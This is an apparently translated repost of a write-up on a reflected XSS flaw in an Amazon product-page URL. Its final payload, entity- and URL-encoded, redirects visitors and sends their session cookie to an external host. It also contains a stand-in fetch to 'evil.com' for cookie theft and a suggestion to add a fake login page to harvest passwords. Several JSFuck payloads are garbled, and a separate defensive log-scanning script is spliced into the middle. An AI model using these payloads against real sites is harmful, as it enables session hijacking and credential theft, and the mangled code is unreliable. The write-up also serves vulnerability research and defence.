
An example Analysis of discovering reflective XSS vulnerabilities in Amazon

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Today I will walk through an example of finding a reflected XSS vulnerability on Amazon, a topic many people may not be familiar with. To make it easier to follow, the editor has summarized the content below, and I hope you take something away from this article.

I have always been interested in the way goods are displayed on Amazon. For example, what is the design architecture behind this display? How do they achieve a good user experience? Some of this can be gleaned from Amazon's A/B testing strategy, but that does not reveal the specific site architecture behind the test design.

An A/B test is a web page optimization method used to increase conversion rate, registration rate and other page metrics. Put simply, A/B testing is a data-driven decision method used to improve the conversion rate of App/H5/Mini Program products and to optimize customer acquisition cost. Internet products increasingly rely on A/B testing to improve click conversion rates and optimize customer acquisition cost.

APP Security Test: the Amazon Shopping APP

One way to look at Amazon's architectural design is to study its shopping APP. One rainy Friday afternoon, I decided to decompile Amazon's Android APP to see what the code looked like. The general steps are: download the APK file, use an online decompiler to extract the code, and go through the URL links and product pages referenced in the different files.

Find links to product pages

Amazon product page links usually contain the segment '/dp/', for example https://www.amazon.com/gp/masclient/dp/, so I simply searched the decompiled files for '/dp/':

Masclient product page

I had looked at many product page URLs, but I had never seen one containing 'masclient' like the following:

https://www.amazon.com/gp/masclient/dp/B00Q7LTUK

This looked like a custom product page used by an internal application. I changed the product id to something else to see how the page would react. Interestingly, the product id is not properly validated during URL parsing, and it is reflected in all capitals (test becomes TEST), so let's see what happens if we inject HTML. A first attempt with a scrolling marquee tag:

https://www.amazon.com/gp/masclient/dp/%3Cmarquee%3E%3Ch2%3Ehi%20mom!

It worked. The product id from the URL is reflected in seven different fields of the page, one of which is inside a script tag:

Problems encountered

Input is converted to uppercase

JavaScript function names such as alert therefore become ALERT and no longer work. Fortunately, this uppercase conversion had already been worked around in an XSS finding on Yahoo.com. The approach is as follows: first convert the plain-text characters into HTML entities, then URL-encode them, and finally place them in the onload attribute of an SVG tag, in a format like this:

Closing tags are not allowed

The server returns a 404 error whenever it encounters a closing tag, so loading an external JavaScript file this way is impossible. The workaround is to inject JavaScript into the DOM tag, or to execute it directly through the vector inside the link's script: adding a few characters such as "}'> breaks out of the surrounding context, and the final URL looks like this:

Https://www.amazon.com/gp/masclient/dp/'}");}JAVASCRIPTHERE;{("

Because of the uppercase conversion, I turned to JSFuck to rewrite the JavaScript as code made only of the characters ! ( ) + [ ]. For example, a URL that triggers the debugger statement looks like this after JSFuck conversion:

Https://www.amazon.com/gp/masclient/dp/'%7D"); % 7D [] [! [] + [+ []] + ([! []] + [] [[]) [+ []] + [+ []] + (! [] + []) [! [] + [! []) [! [] + [! []) [! [] +! []] [([] + [[]) [(!] + []) [+ [] + []] ]) [+! [] + [+ []] + (! []) [! [] +! []] + (! [] + [! []) [! [] +!! []]) [! [] +! [] +!! []] + (!! [] + [! []) [(! [] + []) [+ `.

If there were no limit on URL length, cookie-stealing code such as fetch ("evil.com" + [xss_clean]) could be injected with this technique, but the URL for such a cookie theft would be more than 8000 characters long.

URL link length limit

In my tests, Amazon pages stop responding once the URL exceeds 3500 characters, so the JSFuck encoding technique does not seem usable for cookie theft here. Someone on Reddit suggested jjencode instead, but when I tested it the $ symbol it relies on did not appear to be parsed correctly.

JSFuck: an esoteric programming style based on JavaScript that uses only six characters ([ ] ( ) ! +) to write and execute code. It does not depend on a browser, so it can even be run in Node.js. The converted code uses only these six characters and behaves the same as the code before conversion.
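From the defender's side, the traits described in this section are also what make this class of request easy to spot in access logs: a product id that is not shaped like a product id, HTML metacharacters or character references in the path, a path made almost entirely of the six JSFuck characters, and a URL far longer than the 3500 characters the write-up found the page could handle. The following is an added detection example, not part of the write-up; the log format, the sample log lines, the 10-character id pattern and the heuristic thresholds are all constructed for this example.

```javascript
// Added example (not part of the original write-up): heuristic detection of
// requests matching the reflected-XSS pattern described above, run over
// constructed access-log lines in a simplified combined-log format.

const PRODUCT_ID_RE = /^[A-Z0-9]{10}$/;   // assumed well-formed product id
const MAX_SANE_PATH = 3500;                // length at which the write-up saw pages stop responding

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.5 - - [31/May/2018:10:00:01 +0000] "GET /gp/masclient/dp/B000000000 HTTP/1.1" 200 5120',
  '203.0.113.6 - - [31/May/2018:10:00:02 +0000] "GET /gp/masclient/dp/%3Cmarquee%3E%3Ch2%3Ehi HTTP/1.1" 200 5300',
  '203.0.113.7 - - [31/May/2018:10:00:03 +0000] "GET /gp/masclient/dp/%22%7D%27%3E%3Csvg%20onload%3D%26%23x77%3B HTTP/1.1" 200 5400',
  '203.0.113.8 - - [31/May/2018:10:00:04 +0000] "GET /gp/masclient/dp/' +
    "'%7D%22);%7D" + "[]![]+".repeat(600) + ' HTTP/1.1" 200 5400',
  '203.0.113.9 - - [31/May/2018:10:00:05 +0000] "GET /gp/product/B000000001 HTTP/1.1" 200 4000',
];

// Pull the request path out of a combined-log style line.
function parseRequestPath(line) {
  const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Return the list of reasons a request to the product endpoint looks suspicious
// (empty for benign requests or for other endpoints).
function classifyRequest(path) {
  const reasons = [];
  const m = path.match(/^\/gp\/masclient\/dp\/([^?]*)/);
  if (!m) return reasons;                       // not the endpoint under discussion
  const rawId = m[1];
  let decoded;
  try {
    decoded = decodeURIComponent(rawId);
  } catch {
    decoded = rawId;
    reasons.push("malformed-percent-encoding");
  }
  if (!PRODUCT_ID_RE.test(decoded)) reasons.push("product-id-not-asin-shaped");
  if (/[<>"']/.test(decoded)) reasons.push("html-or-quote-metacharacters");
  if (/&#x?[0-9a-f]+;/i.test(decoded)) reasons.push("html-character-references");
  // JSFuck programs consist almost entirely of [ ] ( ) ! + ; flag long runs of them.
  const jsfuckChars = (decoded.match(/[\[\]()!+]/g) || []).length;
  if (decoded.length >= 40 && jsfuckChars / decoded.length > 0.8) reasons.push("jsfuck-like-alphabet");
  if (path.length > MAX_SANE_PATH) reasons.push("oversized-url");
  return reasons;
}

// Scan a batch of log lines and collect the flagged requests.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const path = parseRequestPath(line);
    if (!path) continue;
    const reasons = classifyRequest(path);
    if (reasons.length > 0) {
      hits.push({ ip: line.split(" ")[0], path: path.slice(0, 60), reasons });
    }
  }
  return hits;
}
```

On the constructed lines, the benign product request and the request to a different endpoint produce no hit, while the marquee probe, the entity-encoded svg onload attempt and the oversized JSFuck-style request are each flagged with the reasons that apply to them. The percent-decoding step matters: without it, the character references and quotes in the third line would not be visible to the checks.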

Warning from Chrome's XSS Auditor

Chrome versions after 67.0.3396.62 actively detect and block XSS attacks, returning an ERR_BLOCKED_BY_XSS_AUDITOR error. To complete the verification test, I used Firefox 60.0.1, which has no built-in XSS auditor.

Final XSS PoC in Firefox

Based on the analysis above, I constructed an Amazon URL that redirects visitors to an external URL and displays the visitor's cookie on that external page. Since every visitor who opens the link has their Amazon cookie captured by it, this would eventually allow the Amazon session to be stolen. A fake Amazon login page could also be added to the external page to indirectly capture the visiting user's username and password.

The final payload used

Test link:

https://www.amazon.com/gp/masclient/dp/%22%7D%27%3E%3Csvg%20onload%3D%26%23x77%3B%26%23x69%3B%26%23x6E%3B%26%23x64%3B%26%23x6F%3B%26%23x77%3B%26%23x2E%3B%26%23x6C%3B%26%23x6F%3B%26%23x63%3B%26%23x61%3B%26%23x74%3B%26%23x69%3B%26%23x6F%3B%26%23x6E%3B%26%23x2E%3B%26%23x72%3B%26%23x65%3B%26%23x70%3B%26%23x6C%3B%26%23x61%3B%26%23x63%3B%26%23x65%3B%26%23x28%3B%26%23x27%3B%26%23x68%3B%26%23x74%3B%26%23x74%3B%26%23x70%3B%26%23x73%3B%26%23x3A%3B%26%23x2F%3B%26%23x2F%3B%26%23x73%3B%26%23x33%3B%26%23x2D%3B%26%23x65%3B%26%23x75%3B%26%23x2D%3B%26%23x77%3B%26%23x65%3B%26%23x73%3B%26%23x74%3B%26%23x2D%3B%26%23x31%3B%26%23x2E%3B%26%23x61%3B%26%23x6D%3B%26%23x61%3B%26%23x7A%3B%26%23x6F%3B%26%23x6E%3B%26%23x61%3B%26%23x77%3B%26%23x73%3B%26%23x2E%3B%26%23x63%3B%26%23x6F%3B%26%23x6D%3B%26%23x2F%3B%26%23x70%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B%26%23x65%3B%26%23x73%3B%26%23x74%3B%26%23x69%3B%26%23x6E%3B%26%23x67%3B%26%23x2D%3B%26%23x74%3B%26%23x61%3B%26%23x72%3B%26%23x67%3B%26%23x65%3B%26%23x74%3B%26%23x2F%3B%26%23x78%3B%26%23x73%3B%26%23x73%3B%26%23x31%3B%26%23x2E%3B%26%23x68%3B%26%23x74%3B%26%23x6D%3B%26%23x6C%3B%26%23x3F%3B%26%23x63%3B%26%23x6F%3B%26%23x6F%3B%26%23x6B%3B%26%23x69%3B%26%23x65%3B%26%23x3D%3B%26%23x27%3B%26%23x2B%3B%26%23x65%3B%26%23x73%3B%26%23x63%3B%26%23x61%3B%26%23x70%3B%26%23x65%3B%26%23x28%3B%26%23x64%3B%26%23x6F%3B%26%23x63%3B%26%23x75%3B%26%23x6D%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B%26%23x2E%3B%26%23x63%3B%26%23x6F%3B%26%23x6F%3B%26%23x6B%3B%26%23x69%3B%26%23x65%3B%26%23x29%3B%26%23x29%3B%3E

URL-encoded link:

https://www.amazon.com/gp/masclient/dp/"}'>

Link after HTML entity conversion:

https://www.amazon.com/gp/masclient/dp/"}'>

A link that pops up alert(1) in the Chrome browser (again using JSFuck encoding):

Https://www.amazon.com/gp/masclient/dp/'%7D%22); % 7D [] [(! []) [+ []] + ([! []] + [] []) [+! [] + [+ []] + (! [] + [! []) [+ []] + [! [] + [! []) [! [] + [[]) [! [] + []) [! [] + []) ! []] [+ (+!! [] + [+ ([] [] [[! [] + []) [+ []] + [] []]) [+! [] + [+ []] + (! [] + [! []) [! [] +! []] + (!! [] +) [+ []] + (!!] + []) [! [] + [! [] + [!] +! []] + (! [] + []) [+ [[]]) [+ []]) + [+ []]) + [! [] + [+ []] + [[]] + [[]]) [+ [[]]) [+ []] + [+ []] + (! [] + []]) [! [] +! [] + []] + [+ []] + (!! [] + []) [! [] +! []] + (! [] + []) [+! []]) [+! [] + [+ [] + (!! + + ([] [! [] + [[]) [+ []]) [+ [[]] + [[]]) [+ [] + [+ [] + [! []) [! []] ] +!! []] + (!! [] + []) [+ []) [! [] + [! [] + [+! [] + []) [+ []] + [[! [] + []) [+ [] + [[]]) [+ []] + [[] + (! [] + []) [! [] + []] + (! [] + []) [+ []] + [! []) [! [] + [! [] + [+! []]) [+!! []]) [+! []] + [+!! [] + ([]] + [] + [] + (! []) []) [! [] +! [] +! []] + (! [] + []) [+ []] + [! []) [+ []] + [+ []) [+ []] + [+ (+!! []) + [+ [[]]) [+ [[]]) [+ []] + [[] + [[]]) [+ []]) [+! []] + [[] + [! [] +! []] + (! [] + []) [+ []] + (! [] + [] +! []] + (!! [] +) [+! []]) [+! []] + [+ []]) + [+ []]) + [! []] ([! []] + [] [[]]) [+! [] + [+ [] + [! [] + [! []) [+ []] + [! []) [! [] +! [] +! []] + (!! [] + []) [+! []] + (!! [] + [+ []) [! + + ([] [] [[! [] + []) [+ [] + []] + [! [] + [+ [] + [! [] + [! []) [! [] +! []] + [! [] + [!]] + [! [] + [! []) [+ []] + [! []) [! [] + [] +! []] + (! [] + []) [+! []] + []) [+ []] + [+ []) [+ []] + [! [] + [[]]) [+! [] + [[]] + [+ []] + (! []) + (! []) [! [] + [! []] + (!! [] + []) [+ [] + (!! []) []) [! [] +! [] +! []] + (! [] + []) [+! []]) [+! [] + [+! [] + (!! []) [+!! [] (!! [] + [+! []) [+! []] + [! [] + [! []) [! [] + []) [+ []] + ([] [[]] + []) [+ []] + (! []) [! []) [+! []] + (+ (+) []]) [+! []] + [+ (+) [[!] + []) [+ [] + [! []) [+ [] + [[]] + [[]]) [+ [] []]) [+ [] (! [] + [] +! []] + (! [] + []) [+ []] + [! [] + [! [] + [[]) + [+ []) [+ []) [+ []]) + [+ []]) [+ []] + [] + [] ) [+! [] + [+ []] + (! 
[]) [! [] + [! []) [+ []] + [! [] + [! []) [! [] +! [] + [! []] + (!! []) [+! []]) [+! []]) [+!! []]) [+! [] + [+! [] + (! []) [+] !! []] + (! [] +! []) [! [] + [] + []) [! [] + [] +! [] + (!! [] + [+! []) + (!! [] + [+ []) () (+! []) 7B (22)

Internal APP endpoints deserve a rigorous security review: a single unvalidated parameter can lead to a serious vulnerability, and an XSS payload can bypass restrictions through obfuscated encoding and still pose a security threat.

After reading the above, do you have a better understanding of this example of finding a reflected XSS vulnerability on Amazon? If you want to learn more, please follow the industry information channel. Thank you for your support.
